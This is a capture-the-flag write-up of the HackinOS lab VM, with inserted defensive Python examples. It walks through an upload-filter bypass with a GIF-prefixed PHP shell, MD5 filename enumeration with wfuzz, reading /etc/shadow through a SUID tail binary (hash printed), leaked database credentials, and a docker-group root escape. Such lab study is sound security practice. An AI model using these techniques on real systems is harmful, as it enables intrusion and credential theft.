VulnHub HackinOS writeup

https://www.vulnhub.com/entry/hackinos-1,295/

Running Sparta gave me ports 22 and 8000. On 8000 I found a defunct WordPress that pointed to localhost; that could be fixed by locally mapping localhost to the VM's network IP.

I also found that Handsome_Container was a valid WordPress username and started brute-forcing it with Burp Suite.

Nikto revealed some interesting info:

- Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 8000
+ Start Time: 2019-05-01 14:55:20 (GMT2)
—————————————————————————
+ Server: Apache/2.4.25 (Debian)
+ Retrieved x-powered-by header: PHP/7.2.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.56.101:8000/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/upload.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/hello.php: PHP error reveals file system path.
+ OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7919 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2019-05-01 14:56:56 (GMT2) (96 seconds)
—————————————————————————
+ 1 host(s) tested

The /upload.php is interesting: it's an image upload function. I started uploading PNG images with PHP reverse shells embedded in them. That didn't work out:

Warning: getimagesize(): PNG file corrupted by ASCII conversion in /var/www/html/upload.php on line 25
🙂

At some point I found the hint hidden in the HTML code: <-- https://github.com/fatihhcelik/Vulnerable-Machine---Hint -->
That revealed the upload.php's code:

That makes it a lot easier. We can see that the file is renamed to the MD5 of the filename plus a random number from 1 to 100.
The script checks the MIME type of the uploaded file but not the extension; allowed are the GIF and PNG MIME types.
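To make the two weaknesses concrete (content sniffed but extension trusted; storage name derived from a guessable 1..100 number), here is an added example that models the check the writeup describes and puts a hardened version next to it. This is not the VM's upload.php; the function names, the constructed sample uploads and the use of the first bytes as a stand-in for getimagesize() are all assumptions of this example.

```python
#!/usr/bin/env python3
"""Model of the upload check described in the writeup, beside a hardened version.
Added example; not the VM's upload.php. Names and sample inputs are constructed."""

import hashlib
import os
import secrets

# Leading bytes of the two image formats the handler accepts.
IMAGE_SIGNATURES = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
}
ALLOWED_TYPES = set(IMAGE_SIGNATURES.values())


def sniff_image_type(data):
    """Detect gif/png from the first bytes only, the way a MIME sniffer does.
    Nothing after the signature is inspected, so trailing script text passes."""
    for sig, kind in IMAGE_SIGNATURES.items():
        if data.startswith(sig):
            return kind
    return None


def weak_store_name(filename, data, number):
    """The writeup's logic: accept if the content sniffs as gif/png, then store
    under md5(filename + number) while keeping the caller's extension.
    `number` stands for the handler's random 1..100 value."""
    if sniff_image_type(data) is None:
        return None
    ext = os.path.splitext(filename)[1]  # attacker controlled and never checked
    digest = hashlib.md5((filename + str(number)).encode()).hexdigest()
    return digest + ext


def hardened_store_name(filename, data):
    """Accept only when the declared extension and the sniffed type agree, then
    store under an unguessable name whose extension comes from the sniffed type."""
    kind = sniff_image_type(data)
    if kind is None:
        return None
    declared = os.path.splitext(filename)[1].lower().lstrip(".")
    if declared not in ALLOWED_TYPES or declared != kind:
        return None
    # 128 bits from the OS CSPRNG: cannot be enumerated with a 100-entry wordlist.
    return f"{secrets.token_hex(16)}.{kind}"


# Constructed inputs: a PNG-looking header and the GIF-prefixed text trick.
PNG_UPLOAD = ("cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
GIF_TEXT_UPLOAD = ("cmd.php", b"GIF89a;\n# non-image text would follow here\n")


def demo():
    """Return {filename: (weak name, hardened name)} for the sample uploads."""
    results = {}
    for name, data in (PNG_UPLOAD, GIF_TEXT_UPLOAD):
        results[name] = (weak_store_name(name, data, 24), hardened_store_name(name, data))
    return results


if __name__ == "__main__":
    for name, (weak, hard) in demo().items():
        print(f"{name}: weak -> {weak}, hardened -> {hard}")
```

The weak path stores cmd.php as a 32-hex-character name that still ends in .php and sits in one of exactly 100 possible names; the hardened path rejects the same upload outright because the declared extension does not match the sniffed type, and an accepted PNG gets a name nobody can enumerate. Serving the upload directory with script execution disabled is the second layer that belongs with this fix.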

So I created a random PNG image with GIMP, opened it with a hex editor and put a PHP reverse shell in it. The upload wouldn't work -.- After learning and experimenting I found a GIF working like this:

cat cmd.php
GIF89a;
#

Now we get to launch the shell, and for that we need to find the uploaded file, so I wrote a script to create the 100 possible hashes of cmd.phpXXX:

#!/usr/bin/python3

import hashlib

# the uploaded filename, e.g. cmd.php, read from stdin
textToEncode = input()
bisHundert = 1

# upload.php appends a random number from 1 to 100 to the filename before
# hashing it, so print all 100 candidate MD5 hashes
while bisHundert <= 100:
    toEncode = textToEncode + str(bisHundert)
    print(hashlib.md5(toEncode.encode('utf-8')).hexdigest())
    bisHundert += 1

$ python3 md5hackinOS_ctf.py > cmdphphashes.txt
cmd.php
thomsane@anansi:~/python$ cat cmdphphashes.txt
04292b8d46833c395942086e6ed2cd2c
d44843c7108897d25a243ffc3cd1edb7
(…)
180134430544955d54b576c726c76217

Now we can supply wfuzz with the payloads stored in the text file.

$ sudo wfuzz -w python/cmdphphashes.txt --hc 404 http://192.168.56.101:8000/uploads/FUZZ.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://192.168.56.101:8000/uploads/FUZZ.php
Total requests: 100

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000024: C=200 3 L 16 W 165 Ch "39b07a3be178f1249b64f60105360c4b"

Total time: 0.245449
Processed Requests: 100
Filtered Requests: 99
Requests/sec.: 407.4165

And it found our "picture" at
http://192.168.56.101:8000/uploads/39b07a3be178f1249b64f60105360c4b.php

My listener received the shell 🙂 which I upgraded to a real TTY with python -c 'import pty; pty.spawn("/bin/bash")', and I started looking for privilege escalation possibilities.

I found /usr/bin/tail to have the SUID bit set and tried:
$ tail -n 100 /root/flag
Life consists of details..

Well, that's not a flag, right? But no permission error either, whereas cat gives: cat: /root/flag: Permission denied

tail -c1G /etc/shadow
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
bin:*:17931:0:99999:7:::
sys:*:17931:0:99999:7:::
sync:*:17931:0:99999:7:::
games:*:17931:0:99999:7:::
man:*:17931:0:99999:7:::
lp:*:17931:0:99999:7:::
mail:*:17931:0:99999:7:::
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::

Enumerating further I found /etc/init.d/delete.sh:
$ cat /etc/init.d/delete.sh
#!/bin/bash

while [ 1 ]
do
    rm -rf /var/www/html/uploads/*.php
    sleep 300
done

Okay... that was the fuck that kept Burp Suite Intruder from finding the file, because of the speed throttling in the free edition. -.-

cat wp-config.php
dumpall.sql

LOCK TABLES `host_ssh_cred` WRITE;
/*!40000 ALTER TABLE `host_ssh_cred` DISABLE KEYS */;
INSERT INTO `host_ssh_cred` VALUES ('hummingbirdscyber','e10adc3949ba59abbe56e057f20f883e');
/*!40000 ALTER TABLE `host_ssh_cred` ENABLE KEYS */;
UNLOCK TABLES;

INSERT INTO `wp_users` VALUES (1,'Handsome_Container','$P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0','handsome_container','pupetofosu@ask-mail.com','','2019-02-23 15:49:54','',0,'Handsome_Container');

hummingbirdscyber
e10adc3949ba59abbe56e057f20f883e is the MD5 of 123456
hummingbirdscyber@vulnvm:~$

Well, well, well... I was in a container before! I noticed it when I looked in /var/www/html and only found an index.html, and I was already suspecting it when I looked at the mounts in the container...

[+] Current User
hummingbirdscyber

[+] Current User ID
uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)

OK, we are in the docker group... so basically root already.
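Both host findings in this writeup, the unexpected SUID bit on /usr/bin/tail and a regular user in the docker group, are things a baseline audit catches before anyone lands a shell. The following is an added example, not code from the VM or the writeup, that checks both: it parses /etc/group-style text for membership in root-equivalent groups and reports setuid binaries that are not on an expected list. The group list, the baseline set and the sample data are constructed for this example; the user and group IDs are modelled on the writeup's output.

```python
#!/usr/bin/env python3
"""Local privilege audit for the two findings in the writeup: an unexpected
setuid binary and a user in the docker group. Added example, not the VM's code."""

import os
import stat

# Groups whose membership is root-equivalent or gives broad read access on a
# typical Debian/Ubuntu host. docker is the one that matters here.
RISKY_GROUPS = {
    "docker": "can run a container with / bind-mounted and edit any host file as root",
    "sudo": "can run arbitrary commands as root",
    "disk": "raw read/write access to block devices",
    "adm": "can read system logs, which may contain credentials",
}

# setuid binaries one expects on a minimal Debian install (constructed baseline);
# anything else with the bit set is an outlier worth explaining.
SETUID_BASELINE = {
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo", "/bin/su", "/bin/mount", "/bin/umount",
}


def parse_group_file(text):
    """Map group name -> set of supplementary members from /etc/group content.
    Primary-group membership (the GID in /etc/passwd) is not covered here."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 4:
            continue
        name, _pw, _gid, members = parts
        groups[name] = {m for m in members.split(",") if m}
    return groups


def risky_memberships(group_text, user):
    """Return {group: reason} for risky groups that list `user` as a member."""
    groups = parse_group_file(group_text)
    return {g: why for g, why in RISKY_GROUPS.items() if user in groups.get(g, set())}


def setuid_outliers(entries, baseline=SETUID_BASELINE):
    """entries: iterable of (path, st_mode). Return sorted paths of regular files
    with the setuid bit set that are not in the baseline."""
    out = []
    for path, mode in entries:
        if stat.S_ISREG(mode) and mode & stat.S_ISUID and path not in baseline:
            out.append(path)
    return sorted(out)


def scan_setuid(root="/usr"):
    """Walk a directory tree without following symlinks and yield (path, mode)
    so the result can be fed to setuid_outliers() on a real host."""
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            p = os.path.join(dirpath, f)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            yield p, st.st_mode


# Constructed sample data modelled on the writeup's output (not real host data).
SAMPLE_GROUP_FILE = """root:x:0:
adm:x:4:syslog,hummingbirdscyber
sudo:x:27:
docker:x:129:hummingbirdscyber
"""
SAMPLE_MODES = [
    ("/usr/bin/passwd", 0o104755),  # setuid, expected
    ("/usr/bin/tail", 0o104755),    # setuid, not expected
    ("/bin/ls", 0o100755),          # plain executable
]

if __name__ == "__main__":
    for g, why in risky_memberships(SAMPLE_GROUP_FILE, "hummingbirdscyber").items():
        print(f"[!] member of {g}: {why}")
    for p in setuid_outliers(SAMPLE_MODES):
        print(f"[!] unexpected setuid binary: {p}")
    # On a real host: setuid_outliers(scan_setuid("/usr"))
```

Run against the sample data it reports docker and adm membership for hummingbirdscyber and /usr/bin/tail as the one setuid outlier, which is exactly the chain this writeup walks. The baseline should be generated from a clean image of the same distribution rather than typed by hand, so a new setuid bit shows up as a diff instead of relying on someone's memory of what is normal.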

Let's look at which containers are running:

hummingbirdscyber@vulnvm:~$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
252fa8cb1646 ubuntu "/bin/bash" 2 months ago Up 2 days brave_edison
1afdd1f6b82c wordpress:latest "docker-entrypoint.s…" 2 months ago Up 2 days 0.0.0.0:8000->80/tcp experimental_wordpress_1
81a93420fd22 mysql:5.7 "docker-entrypoint.s…" 2 months ago Up 2 days 3306/tcp, 33060/tcp experimental_db_1

Since I run the vulnerable VM without internet access for security reasons, I used the ubuntu image that already exists on the host to elevate my privileges:

hummingbirdscyber@vulnvm:~$ docker run -v /:/hostOS -i -t ubuntu

Now we are running a new container, and the / filesystem of the host is mounted at /hostOS:

root@c50ed36b8d25:/hostOS/root# cat flag

Congratulations!

                              -ys-                                                               
                                /mms.                                                            
                                  +NMd+`                                                         
                               `/so/hMMNy-                                     
                                 `+mMMMMMMd/           ./oso/-                           
                                  `/yNMMMMMMMMNo`   .`   +-                   
                                  .oyhMMMMMMMMMMN/.     o.                  
                                    `:+osysyhddhs`    `o`                  
                                     .:oyyhshMMMh.   .:                      
                                  `-//:. `:sshdh: `                         
                                             -so:.                           
                                            .yy.                              
                                          :odh                            
                                        +o--d`                 
                                      /+. .d`                           
                                    -/`  `y`                                  
                                  `:`   `/                                    
                                 `.     `

that was fun 🙂 <3
